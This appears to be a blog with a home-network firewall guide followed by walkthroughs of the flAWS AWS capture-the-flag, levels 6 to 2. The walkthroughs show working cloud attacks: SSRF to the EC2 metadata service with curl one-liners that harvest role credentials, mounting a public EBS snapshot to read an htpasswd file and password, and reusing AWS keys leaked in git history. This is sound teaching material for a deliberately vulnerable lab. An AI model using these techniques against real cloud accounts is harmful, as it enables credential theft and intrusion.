Segregated research network with EdgeRouter X

I required a segregated region of my home network that can leverage the same internet connection and NAT border, but be isolated from communications with anything else on my network. This was primarily to be used as a quarantine area to conduct research, and somewhere to place foreign untrusted devices.

I decided to use the eth3 interface on my EdgeRouter X for this purpose, and plug in a standard ol’ router/AP combo using it’s WAN interface and to obtain an IP address via DHCP.

Here are the steps and configuration is used:

Via the ER web GUI:

  • Remove eth3 from the switch0 group
  • Configure an ip and subnet for eth3, for example 10.0.0.1/30
  • Setup DHCP for 10.0.0.0/30, with the router specified as 10.0.0.1

Via the ER cli:

  • Enter configure mode, and create a network-group that specifies the subnet(s) of my ‘Production’ LAN subnet that I don’t want the research network to be able to communicate with:
      configure
      set firewall group network-group LAN_NETWORKS
      set firewall group network-group LAN_NETWORKS description "LAN Networks"
      set firewall group network-group LAN_NETWORKS network 192.168.0.0/24
    
  • Create a firewall ruleset to allow the research network to connect to everything (i.e. internet) except for the the ‘Production’ LAN subnet specified above.

     

      set firewall name PROTECT_IN
      set firewall name PROTECT_IN default-action accept
      set firewall name PROTECT_IN rule 20 action drop
      set firewall name PROTECT_IN rule 20 description "Drop LAN_NETWORKS"
      set firewall name PROTECT_IN rule 20 destination group network-group LAN_NETWORKS
      set firewall name PROTECT_IN rule 20 protocol all
    
  • Create a firewall ruleset to allow the research network to use the DHCP and DNS services provided by the EdgeRouter X:
      set firewall name PROTECT_LOCAL
      set firewall name PROTECT_LOCAL default-action drop
      set firewall name PROTECT_LOCAL rule 10 action accept
      set firewall name PROTECT_LOCAL rule 10 description "Accept DNS"
      set firewall name PROTECT_LOCAL rule 10 destination port 53
      set firewall name PROTECT_LOCAL rule 10 protocol tcp_udp
      set firewall name PROTECT_LOCAL rule 20 action accept
      set firewall name PROTECT_LOCAL rule 20 description "Accept DHCP"
      set firewall name PROTECT_LOCAL rule 20 destination port 67
      set firewall name PROTECT_LOCAL rule 20 protocol udp
    
  • Commit the changes made thus far
      commit
    
  • Now need to associate the firewall rulesets with the interface being used for the research network, in my case eth3
      set interfaces ethernet eth3 firewall in name PROTECT_IN
      set interfaces ethernet eth3 firewall local name PROTECT_LOCAL
    
  • Finally, commit and save the configuration
      commit
      save
    

 

 

 

flAWS – AWS CTF – Level 6

Level 6 – Challenge statement:

For this final challenge, you’re getting a user access key that has the SecurityAudit policy attached to it. See what else it can do and what else you might find in this AWS account.

Access key ID: AKIAJFQ6E7BY57Q3OBGA

Secret: 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

link

Background

flaws.cloud itself says it best:

Through a series of levels you'll learn about common mistakes and gotchas when using Amazon Web Services (AWS). 
There are no SQL injection, XSS, buffer overflows, or many of the other vulnerabilities you might have seen before. As much as possible, these are AWS specific issues.

A series of hints are provided that will teach you how to discover the info you'll need. 
If you don't want to actually run any commands, you can just keep following the hints which will give you the solution to the next level. 
At the start of each level you'll learn how to avoid the problem the previous level exhibited.

Scope: Everything is run out of a single AWS account, and all challenges are sub-domains of flaws.cloud. 

My approach:

This time we start with purportedly valid creds, so it seems we need to try a look for some misconfigurations to exploit.

First lets load the creds for use in the AWS CLI

        $ aws configure --profile flawslevel6          
        AWS Access Key ID [None]: AKIAJFQ6E7BY57Q3OBGA
        AWS Secret Access Key [None]: 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
        Default region name [None]: us-west-2
        Default output format [None]:

The AWS documentation states the following as it related to the SecurityAudit managed policy:

        Security Auditor
        AWS managed policy name: SecurityAudit

        Use case: This user monitors accounts for compliance with security requirements. This user can access logs and                 events to investigate potential security breaches or potential malicious activity.

        Policy description: This policy grants permissions to view configuration data for many AWS services and to review               their logs.

Interesting, I noticed a S3 bucket called flaws-log earlier, lets see:

        aws s3 ls s3://flaws-logs --profile flawslevel6
        An error occurred (AccessDenied) when calling the ListObjects operation: Access Denied

Ok, not that easy.

Other AWS services that this policy is likely related to would be CloudTrail and CloudWatch…

        aws cloudtrail describe-trails --profile flawslevel6
        "trailList": [      
          {
          "IncludeGlobalServiceEvents": true,
          "Name": "cloudtrail",
          "S3KeyPrefix": "cloudtrail",
          "TrailARN": "arn:aws:cloudtrail:us-west-2:975426262029:trail/cloudtrail",
          "LogFileValidationEnabled": true,
          "IsMultiRegionTrail": true,
          "HasCustomEventSelectors": false,
          "S3BucketName": "flaws-logs",
          "HomeRegion": "us-west-2"
          }
        ] 

Indeed CouldTrail is ON, with the trail name of cloudtrail and pushing files with the cloudtrail prefix to the flaws-logs bucket.

Lets see if we can list the CloudTrail events:

        ~$ aws cloudtrail lookup-events --profile flawslevel6                                                                                                                                           
        An error occurred (AccessDeniedException) when calling the LookupEvents operation: User: arn:aws:iam::975426262029:user/Level6 is not authorized to perform: cloudtrail:LookupEvents

Nopes.

Lets learn more about this user:

  $ aws --profile flawslevel6 iam get-user
  {                                                                                                                         
        "User": {                                                                                                            
        "UserName": "Level6",                                                                                             
        "Path": "/",                                                                                                       
        "CreateDate": "2017-02-26T23:11:16Z",                                                                               
        "UserId": "AIDAIRMDOSCWGLCDWOG6A",
        "Arn": "arn:aws:iam::975426262029:user/Level6"
        }
  }                  

And their attached policies:

        $ aws --profile flawslevel6 iam list-attached-user-policies --user-name Level6
        {
            "AttachedPolicies": [
                {
                    "PolicyName": "list_apigateways",
                    "PolicyArn": "arn:aws:iam::975426262029:policy/list_apigateways"
                },
                {
                    "PolicyName": "SecurityAudit",
                    "PolicyArn": "arn:aws:iam::aws:policy/SecurityAudit"
                }
            ]
        }

Oh!, this user is also attached to the list_apigateways policy.

Lets learn more about this policy:

        aws --profile flawslevel6 iam get-policy  --policy-arn arn:aws:iam::975426262029:policy/list_apigateways
        {
            "Policy": {
                "PolicyName": "list_apigateways",
                "Description": "List apigateways",
                "CreateDate": "2017-02-20T01:45:17Z",
                "AttachmentCount": 1,
                "IsAttachable": true,
                "PolicyId": "ANPAIRLWTQMGKCSPGTAIO",
                "DefaultVersionId": "v4",
                "Path": "/",
                "Arn": "arn:aws:iam::975426262029:policy/list_apigateways",
                "UpdateDate": "2017-02-20T01:48:17Z"
            }
        }

Now that we have the ARN and the version id – we can get the meat of this policy:

        $ aws --profile flawslevel6 iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4
        {
            "PolicyVersion": {
                "CreateDate": "2017-02-20T01:48:17Z",
                "VersionId": "v4",
                "Document": {
                    "Version": "2012-10-17",
                    "Statement": [
                        {
                            "Action": [
                                "apigateway:GET"
                            ],
                            "Resource": "arn:aws:apigateway:us-west-2::/restapis/*",
                            "Effect": "Allow"
                        }
                    ]
                },
                "IsDefaultVersion": true
            }
        }

Now we know that this user is allowed to use the action GET with the resource arn:aws:apigateway:us-west-2::/restapis/*

API Gateway is typically used in conjunction with Lambda functions, lets see if we can see any:

        $ aws --region us-west-2 --profile flawslevel6 lambda list-functions
        {
            "Functions": [
                {
                    "TracingConfig": {
                        "Mode": "PassThrough"
                    },
                    "Version": "$LATEST",
                    "CodeSha256": "2iEjBytFbH91PXEMO5R/B9DqOgZ7OG/lqoBNZh5JyFw=",
                    "FunctionName": "Level6",
                    "MemorySize": 128,
                    "CodeSize": 282,
                    "FunctionArn": "arn:aws:lambda:us-west-2:975426262029:function:Level6",
                    "Handler": "lambda_function.lambda_handler",
                    "Role": "arn:aws:iam::975426262029:role/service-role/Level6",
                    "Timeout": 3,
                    "LastModified": "2017-02-27T00:24:36.054+0000",
                    "Runtime": "python2.7",
                    "Description": "A starter AWS Lambda function."
                }
            ]
        }

There is one! Called Level6 – lets look into the policy:

        aws --region us-west-2 --profile flawslevel6 lambda get-policy --function-name Level6
        {
            "Policy": "{\"Version\":\"2012-10-17\",\"Id\":\"default\",\"Statement\":[{\"Sid\":\"904610a93f593b76ad66ed6ed82c0a8b\",\"Effect\":\"Allow\",\"Principal\":{\"Service\":\"apigateway.amazonaws.com\"},\"Action\":\"lambda:InvokeFunction\",\"Resource\":\"arn:aws:lambda:us-west-2:975426262029:function:Level6\",\"Condition\":{\"ArnLike\":{\"AWS:SourceArn\":\"arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6\"}}}]}"
        }

Interesting info, we can executearn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6\ and s33ppypa75 is a rest-api-id

To get the full path we’ll need the stage name:

        aws --profile flawslevel6 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75"
        {
            "item": [
                {
                    "stageName": "Prod",
                    "cacheClusterEnabled": false,
                    "cacheClusterStatus": "NOT_AVAILABLE",
                    "deploymentId": "8gppiv",
                    "lastUpdatedDate": 1488155168,
                    "createdDate": 1488155168,
                    "methodSettings": {}
                }
            ]
        }

Stage name is: Prod

So we have all the pieces to complete the format: https://<rest-api-id>.execute-api.<region>.amazonaws.com/<stage-name>/<lambda function>

Therefore, we can access the endpoint here: https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6

If we browse there we get the following output:

        "Go to http://theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud/d730aa2b/"  

Done!

Level 6 complete.

flAWS – AWS CTF – Level 5

Level 5 – Challenge statement:

This EC2 has a simple HTTP only proxy on it. Here are some examples of it’s usage:

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/flaws.cloud/

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/summitroute.com/blog/feed.xml

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/neverssl.com/

See if you can use this proxy to figure out how to list the contents of the level6 bucket at level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud that has a hidden directory in it.

link

Background

flaws.cloud itself says it best:

Through a series of levels you'll learn about common mistakes and gotchas when using Amazon Web Services (AWS). 
There are no SQL injection, XSS, buffer overflows, or many of the other vulnerabilities you might have seen before. As much as possible, these are AWS specific issues.

A series of hints are provided that will teach you how to discover the info you'll need. 
If you don't want to actually run any commands, you can just keep following the hints which will give you the solution to the next level. 
At the start of each level you'll learn how to avoid the problem the previous level exhibited.

Scope: Everything is run out of a single AWS account, and all challenges are sub-domains of flaws.cloud. 

My approach:

We need to find the hidden directory within the level 6 bucket – level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud

What happens if we try browse directly to the bucket via a browser?

        Access Denied
        Level 6 is hosted in a sub-directory, but to figure out that directory, you need to play level 5 properly.

Ok, so the level 5 EC2 instance gives us a proxy, where the target URL should be appended to the end of http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/

What if we tried to browse to the Level6 bucket via the proxy?

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud

No dice.

I spend quite a bit of time thinking this one through, and tried a few fruitless things. So decided to get a hint via: http://level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/hint1.html which said:

        On cloud services, including AWS, the IP 169.254.169.254 is magical. It's the metadata service.
        There is an RFC on it (RFC-3927), but you should read the AWS specific docs on it here.

Ah! of course! what if use the proxy to get it’s own instance meta-data… perhaps we could get some credentials or other useful info to use…

Lets try and find something – within the latest meta-data…

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/

        ami-id
        ami-launch-index
        ami-manifest-path
        block-device-mapping/
        hostname
        iam/
        instance-action
        instance-id
        instance-type
        local-hostname
        local-ipv4
        mac
        metrics/
        network/
        placement/
        profile
        public-hostname
        public-ipv4
        public-keys/
        reservation-id
        security-groups
        services/

iam/ looks interesting – lets go in there:

        info
        security-credentials/

security-credentials/ – yes please, lets follow that

        flaws

flaws/ – nice, that is our IAM account name

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws

        {
          "Code" : "Success",
          "LastUpdated" : "2018-02-07T06:23:47Z",
          "Type" : "AWS-HMAC",
          "AccessKeyId" : "ASIAJXNSZYFI7LKRQ4KA",
          "SecretAccessKey" : "gX0Tlc11lbWsdhPMKSGtWCAR2EuTqauh6DFAt4f8",
          "Token" : "FQoDYXdzELj//////////wEaDKOpciHx0oqRxX5GbiK3A/MQWiOVjusWUJ0Uq2gVwHpsro6Yz9kztwcyyKmzMSUxc85LAtdyr2Q6zQ5AIe1GATRGWAqpG+z1ZZdKIrernZaqc6Cv8zNkQsPC0yLVmTjGJcBG443u6phnrnmkea+nXzA2X9rHC191XIlWH3JfOqR4L92+/Q9uOmt3K1XHoXkzHWr+OdbbvYedYAjqngLz6ifOGGZ1LC5s6a35/hw4ty3xaAXGC1x1z+uDuq5AM3FcrNv21FdBKOzz4VqKg3FXeJi4VLyetuOYJojj/i0goLZ1Lw7FGoX3lW1xwBV18yVQTscaEWI/s5EQS1nNOo+XNkbuT+CuxQUvAbU5CJyLCt7DPWz3SPBn/YY1mGgDRJdRWErOQzxw1PYQgrNVxca7ZhzLlKjR7J26IpD0E88W4Y4hRjut3wtlL5QXqNCUe4Wob9szWi/ClNxLxscsDNxlIhvbStwgEVrqg3UDLQrS+KDhL2uk1Rd49SQ5vYLQ2TjalvDxl+RWmC3la5GzqrfHFQIhhagb4ciJpdKc2R+J7Gn8gGdUZt8cEym0iUR0Dg79PO+s529nIvo+d0Z6lyXh4DLRTIYUN+wo1bbq0wU=",
          "Expiration" : "2018-02-07T12:33:10Z"
        }

Great! creds!

But given this will be an IAM Role, we can’t just use the AccessKeyId and SecretAccessKey as these were issued by STS (security Token Service), hence need to use the Token too. Furthermore, these values rotate automatically – so will need to get them programmatically and use them right away.

So I think I’ll script it as follows to pull them into environment variables programmatically:

        export AWS_ACCESS_KEY_ID=`curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws | grep "AccessKeyId" | awk '{print $3}' | cut -d\" -f2`

        export AWS_SECRET_ACCESS_KEY=`curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws | grep "SecretAccessKey" | awk '{print $3}' | cut -d\" -f2`

        export AWS_SESSION_TOKEN=`curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws | grep "Token" | awk '{print $3}' | cut -d\" -f2`

Then lets see if we can list the contents of the level 6 bucket:

        aws s3 ls s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud                                                 
                                   PRE ddcc78ff/                                                                           
        2017-02-27 10:11:07        871 index.html

Oh! looky – ddcc78ff/ must be our sub-directory, lets browse there: http://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ddcc78ff/

Winner!

Level 6 unlocked.

flAWS – AWS CTF – Level 4

Level 4 – Challenge statement:

For the next level, you need to get access to the web page running on an EC2 at 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud

It’ll be useful to know that a snapshot was made of that EC2 shortly after nginx was setup on it.

link

Background

flaws.cloud itself says it best:

Through a series of levels you'll learn about common mistakes and gotchas when using Amazon Web Services (AWS). 
There are no SQL injection, XSS, buffer overflows, or many of the other vulnerabilities you might have seen before. As much as possible, these are AWS specific issues.

A series of hints are provided that will teach you how to discover the info you'll need. 
If you don't want to actually run any commands, you can just keep following the hints which will give you the solution to the next level. 
At the start of each level you'll learn how to avoid the problem the previous level exhibited.

Scope: Everything is run out of a single AWS account, and all challenges are sub-domains of flaws.cloud. 

My approach:

Challenge states that there is an EBS snapshot of the EC2 instance – so I’d imagine we could find our creds in there.

Lets try and get a VolumeID of the running instances:

        aws ec2 describe-instances --profile flaws
        <snip>
        "Ebs": {
             "Status": "attached",
             "DeleteOnTermination": true,
             "VolumeId": "vol-04f1c039bc13ea950",
             "AttachTime": "2017-02-12T22:29:25.000Z"
        }
        <snip>

Convenient, only a single running EC2 instance, and has a VolumeID of vol-04f1c039bc13ea950 – but lets be sure it’s actually the instance we want my comparing the public IPv4 address

        aws ec2 describe-instances --profile flaws
        "Association": {
             "PublicIp": "35.165.182.7",
             "PublicDnsName": "ec2-35-165-182-7.us-west-2.compute.amazonaws.com",
             "IpOwnerId": "amazon"
        }
        <snip>

The running instance has an public IP of 35.165.182.7, lets do a look-up on 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud to see if it matches:

        ~$ nslookup 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud
        Server:         8.8.8.8
        Address:        8.8.8.8#53

        Non-authoritative answer:
        4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud    canonical name = ec2-35-165-182-7.us-west-2.compute.amazonaws.com.
        Name:   ec2-35-165-182-7.us-west-2.compute.amazonaws.com
        Address: 35.165.182.7

It’s a match!

Now lets find that EBS snapshot by VolumeId

        ~$ aws ec2 describe-snapshots --filters "Name=volume-id, Values=vol-04f1c039bc13ea950" --profile flaws
        {
            "Snapshots": [
                {
                    "Description": "",
                    "Tags": [
                        {
                            "Value": "flaws backup 2017.02.27",
                            "Key": "Name"
                        }
                    ],
                    "Encrypted": false,
                    "VolumeId": "vol-04f1c039bc13ea950",
                    "State": "completed",
                    "VolumeSize": 8,
                    "StartTime": "2017-02-28T01:35:12.000Z",
                    "Progress": "100%",
                    "OwnerId": "975426262029",
                    "SnapshotId": "snap-0b49342abd1bdcb89"
                }
            ]
        }

Now let’s check the createVolumePermission on this snapshot:

        ~$ aws ec2 describe-snapshot-attribute --snapshot-id snap-0b49342abd1bdcb89 --attribute createVolumePermission --profile flaws
        {
            "SnapshotId": "snap-0b49342abd1bdcb89",
            "CreateVolumePermissions": [
                {
                    "Group": "all"
                }
            ]
        }

Oops!, Anyone can create a volume based on this snapshot.

Let’s try and create a volume from this snapshot in our own AWS account so we can use it to spin up an EC2 instance with our own SSH keypair and poke around.

        aws ec2 create-volume --region us-west-2 --availability-zone us-west-2a --snapshot-id snap-0b49342abd1bdcb89
        
        {
              <snip>
              "State": "creating"
              <snip>
        }

Looks good!

        aws ec2 describe-volumes
        
        {
              <snip>
              "VolumeId": "vol-0a8f64220765bd28a"
              "State": "available"
              <snip>
        }            

Very nice!

How we need to make an EC2 instance, and mount this extra volume to poke around… Gonna do this via the AWS Console, as that way I don’t need to go and find AMI IDs, Security Group names, Subnets IDs etc

<I’m off at the AWS Console, spinning up a T2.micro in us-west-2a – with a security group allowing SSH in>…

I’m back.

First lets get the EC2 instance ID:

        aws ec2 describe-instances
        {
              <snip>
              "InstanceId": "i-060483a9958562fad"
              <snip>
        }

Now lets attach the volume we created on /dev/sdf:

        aws ec2 attach-volume --volume-id vol-0a8f64220765bd28a --instance-id i-060483a9958562fad --device /dev/sdf
        {
              <snip>
              "State": "attaching"
              <snip>
        }

Great, now we should be good to SSH into the instance using our own keypair. Lets get the public IP:

        aws ec2 describe-instances --instance-id i-060483a9958562fad
        {
              <snip>
              "PublicIp": "34.217.133.22",
              <snip>
        }

Ok SSH time:

        ssh -i mysupasecretprivatekey ec2user@34.217.133.22

Lets see if we can see the block device

        [ec2-user@ip-172-31-31-47 ~]$ lsblk
        NAME    MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
        xvda    202:0    0   8G  0 disk
        └─xvda1 202:1    0   8G  0 part /
        xvdf    202:80   0   8G  0 disk
        └─xvdf1 202:81   0   8G  0 part

There is the virtual disk – /dev/xvdf1, lets make a mount point and mount it:

        sudo mkdir /mnt/flaws
        sudo mount /dev/xvdf1 /mnt/flaws
        $ mount
        <snip>
        /dev/xvdf1 on /mnt/flaws type ext4 (rw,relatime,data=ordered)
        <snip>

Lets see what we can find:

        $ ls /mnt/flaws/
        bin   dev  home        initrd.img.old  lib64       media  opt   root  sbin  srv  tmp  var      vmlinuz.old
        boot  etc  initrd.img  lib             lost+found  mnt    proc  run   snap  sys  usr  vmlinuz

Looks like a fvalid linux filesystem layout, now… where to get those crendentials. The challenge said… “a snapshot was made of that EC2 shortly after nginx was setup on it.”

        $ cat /mnt/flaws/etc/nginx/.htpasswd
        flaws:$apr1$4ed/7TEL$cJnixIRA6P4H8JDvKVMku0

Juicy!

Username: flaws

However is that password encrypted or plain-text? I quick attempt at http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/ confirmed it’s not clear-text

But it must have been entered in plain-text originally, lets see what user directories we have…

        # ls /mnt/flaws/home
        ubuntu

Just the one user – ubuntu

Oops! they left the script in their home-directory with the command to generate the encrypted htpasswd from the clear-text one!

        $ cat setupNginx.sh | more
        htpasswd -b /etc/nginx/.htpasswd flaws nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M

Lets try that. User: flaws Password: nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M

WORKS!

BTW – the /home/ubuntu/.bash_history makes for good reading too

Tells us to go to page: http://level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/

Level 5 unlocked.

flAWS – AWS CTF – Level 3

Level 3 – Challenge statement:

The next level is fairly similar, with a slight twist. Time to find your first AWS key! I bet you’ll find something that will let you list what other buckets are.

link

Background

flaws.cloud itself says it best:

Through a series of levels you'll learn about common mistakes and gotchas when using Amazon Web Services (AWS). 
There are no SQL injection, XSS, buffer overflows, or many of the other vulnerabilities you might have seen before. As much as possible, these are AWS specific issues.

A series of hints are provided that will teach you how to discover the info you'll need. 
If you don't want to actually run any commands, you can just keep following the hints which will give you the solution to the next level. 
At the start of each level you'll learn how to avoid the problem the previous level exhibited.

Scope: Everything is run out of a single AWS account, and all challenges are sub-domains of flaws.cloud. 

My approach:

Similar suggests S3 again, perhaps one with AWS access and secret keys in it.

We know that the bucket name to start from is level3-9afd3927f195e10225021a578e6f78df.flaws.cloud

Let’s first try public access, by browsing too: http://s3-us-west-2.amazonaws.com/level3-9afd3927f195e10225021a578e6f78df.flaws.cloud

Works!, seems to be a bunch of files in there.

Lets get a cleaner list by using the AWS CLI:

  ~$ aws s3 ls s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud --recursive
  2017-09-17 23:12:24         52 .git/COMMIT_EDITMSG
  2017-09-17 23:12:24         23 .git/HEAD
  2017-09-17 23:12:24        130 .git/config
  2017-09-17 23:12:24         73 .git/description
  2017-09-17 23:12:24        452 .git/hooks/applypatch-msg.sample
  2017-09-17 23:12:24        896 .git/hooks/commit-msg.sample
  2017-09-17 23:12:24        189 .git/hooks/post-update.sample
  2017-09-17 23:12:24        398 .git/hooks/pre-applypatch.sample
  2017-09-17 23:12:24       1704 .git/hooks/pre-commit.sample
  2017-09-17 23:12:24       4898 .git/hooks/pre-rebase.sample
  2017-09-17 23:12:24       1239 .git/hooks/prepare-commit-msg.sample
  2017-09-17 23:12:24       3611 .git/hooks/update.sample
  2017-09-17 23:12:24        600 .git/index
  2017-09-17 23:12:24        240 .git/info/exclude
  2017-09-17 23:12:24        359 .git/logs/HEAD
  2017-09-17 23:12:24        359 .git/logs/refs/heads/master
  2017-09-17 23:12:24        679 .git/objects/0e/aa50ae75709eb4d25f07195dc74c7f3dca3e25
  2017-09-17 23:12:24        770 .git/objects/2f/c08f72c2135bb3af7af5803abb77b3e240b6df
  2017-09-17 23:12:25        820 .git/objects/53/23d77d2d914c89b220be9291439e3da9dada3c
  2017-09-17 23:12:25        245 .git/objects/61/a5ff2913c522d4cf4397f2500201ce5a8e097b
  2017-09-17 23:12:25     112013 .git/objects/76/e4934c9de40e36f09b4e5538236551529f723c
  2017-09-17 23:12:25        560 .git/objects/92/d5a82ef553aae51d7a2f86ea0a5b1617fafa0c
  2017-09-17 23:12:25        191 .git/objects/b6/4c8dcfa8a39af06521cf4cb7cdce5f0ca9e526
  2017-09-17 23:12:25         42 .git/objects/c2/aab7e03933a858d1765090928dca4013fe2526
  2017-09-17 23:12:25        904 .git/objects/db/932236a95ebf8c8a7226432cf1880e4b4017f2
  2017-09-17 23:12:25         98 .git/objects/e3/ae6dd991f0352cc307f82389d354c65f1874a2
  2017-09-17 23:12:25        279 .git/objects/f2/a144957997f15729d4491f251c3615d508b16a
  2017-09-17 23:12:25        125 .git/objects/f5/2ec03b227ea6094b04e43f475fb0126edb5a61
  2017-09-17 23:12:25         41 .git/refs/heads/master
  2017-02-27 08:14:33     123637 authenticated_users.png
  2017-02-27 08:14:34       1552 hint1.html
  2017-02-27 08:14:34       1426 hint2.html
  2017-02-27 08:14:35       1247 hint3.html
  2017-02-27 08:14:33       1035 hint4.html
  2017-02-27 10:05:16       1703 index.html
  2017-02-27 08:14:33         26 robots.txt

2 interesting bits here, namely authenticated_users.png and the .git directory contents.

Lets browse to have a look at the PNG first: http://s3-us-west-2.amazonaws.com/level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/authenticated_users.png

Ok thats nothing useful, just an image for the level 3 documentation…

Now lets poke around the .git directory…

Lets make a local copy first:

$ aws s3 cp s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud ~/testtest --recursive

.git/COMMIT_EDITMSG contains the message: “Oops, accidentally added something I shouldn’t have” – which likely means that they did a commit inclusive of AWS keys…

Furthermore if I run git log I get:

  commit b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526
  Author: 0xdabbad00 <scott@summitroute.com>
  Date:   Sun Sep 17 09:10:43 2017 -0600

      Oops, accidentally added something I shouldn't have

  commit f52ec03b227ea6094b04e43f475fb0126edb5a61
  Author: 0xdabbad00 <scott@summitroute.com>
  Date:   Sun Sep 17 09:10:07 2017 -0600

      first commit

This implies there is something in commit f52ec03b227ea6094b04e43f475fb0126edb5a61 that the developer didn’t want there, and removed it in commit b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526

Lets have a closer look at commit f52ec03b227ea6094b04e43f475fb0126edb5a61

git checkout f52ec03b227ea6094b04e43f475fb0126edb5a61

Then lets look at what file(s) have popped out:

        ~/testtest$ ls
        access_keys.txt  authenticated_users.png  hint1.html  hint2.html  hint3.html  hint4.html  index.html  robots.txt

Oops, there is access_keys.txt, lets look

        ~/testtest$ cat access_keys.txt
        access_key AKIAJ366LIPB4IJKT7SA
        secret_access_key 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

Lets make another AWS configure profile using the newly discovered keys:

        ~/testtest$ aws configure --profile flawslevel3
        AWS Access Key ID [None]: AKIAJ366LIPB4IJKT7SA
        AWS Secret Access Key [None]: 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
        Default region name [None]: us-west-2
        Default output format [None]:

Now let’s see if they are valid, and if any interesting S3 buckets are available:

        $ aws s3 ls --profile flawslevel3
        2017-02-19 03:41:52 2f4e53154c0a7fd086a04a12a452c2a4caed8da0.flaws.cloud
        2017-05-30 00:34:53 config-bucket-975426262029
        2017-02-27 04:06:33 flaws-logs
        2017-02-19 03:40:54 flaws.cloud
        2017-02-24 13:15:42 level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud
        2017-02-27 02:29:03 level3-9afd3927f195e10225021a578e6f78df.flaws.cloud
        2017-02-27 02:49:31 level4-1156739cfb264ced6de514971a4bef68.flaws.cloud
        2017-02-27 03:49:03 level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud
        2017-02-27 03:48:40 level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud
        2017-02-27 04:07:13 theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud

Indeed!, there are the bucket names for level 2 to the end.

Lets try browse to Level 4 publicly: http://level4-1156739cfb264ced6de514971a4bef68.flaws.cloud/

Level 4 unlocked.

flAWS – AWS CTF – Level 2

Level 2 – Challenge statement:

The next level is fairly similar, with a slight twist. You’re going to need your own AWS account for this. You just need the free tier.

link

Background

flaws.cloud itself says it best:

Through a series of levels you'll learn about common mistakes and gotchas when using Amazon Web Services (AWS). 
There are no SQL injection, XSS, buffer overflows, or many of the other vulnerabilities you might have seen before. As much as possible, these are AWS specific issues.

A series of hints are provided that will teach you how to discover the info you'll need. 
If you don't want to actually run any commands, you can just keep following the hints which will give you the solution to the next level. 
At the start of each level you'll learn how to avoid the problem the previous level exhibited.

Scope: Everything is run out of a single AWS account, and all challenges are sub-domains of flaws.cloud. 

My approach:

Given that they say this is similar to before, I imagine it’s related to S3 permissions again – and they require us to have our own AWS Account – so initial thinking is this is a misconfiguration in cross-AWS account access.

We know the bucket name is level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud

Configure AWS CLI with your Access Key and Secret Key:

  ~$ aws configure
  AWS Access Key ID [********************]:
  AWS Secret Access Key [********************]:
  Default region name [ap-southeast-1]: us-west-2
  Default output format [None]:

Now lets list the objects in the bucket via the AWS CLI:

        :~$ aws s3 ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud --region us-west-2 --recursive
        2017-02-27 10:02:15      80751 everyone.png
        2017-03-03 11:47:17       1433 hint1.html
        2017-02-27 10:04:39       1035 hint2.html
        2017-02-27 10:02:14       2786 index.html
        2017-02-27 10:02:14         26 robots.txt
        2017-02-27 10:02:15       1051 secret-e4443fc.html

Again, the secret file looks good, lets open it in a browser

The URL format for S3 HTTP end points are as follows: s3-<region>.amazonaws.com/<bucketname>

So given the information we have, we can tell that the s3 end point for this bucket is: http://s3-us-west-2.amazonaws.com/level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud

So lets open the browser too: http://s3-us-west-2.amazonaws.com/level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/secret-e4443fc.html

Level 3 unlocked.

flAWS – AWS CTF – Level 1

Level 1 – Challenge statement:

This level is buckets of fun. See if you can find the first sub-domain.

Background

flaws.cloud itself says it best:

Through a series of levels you'll learn about common mistakes and gotchas when using Amazon Web Services (AWS). 
There are no SQL injection, XSS, buffer overflows, or many of the other vulnerabilities you might have seen before. As much as possible, these are AWS specific issues.

A series of hints are provided that will teach you how to discover the info you'll need. 
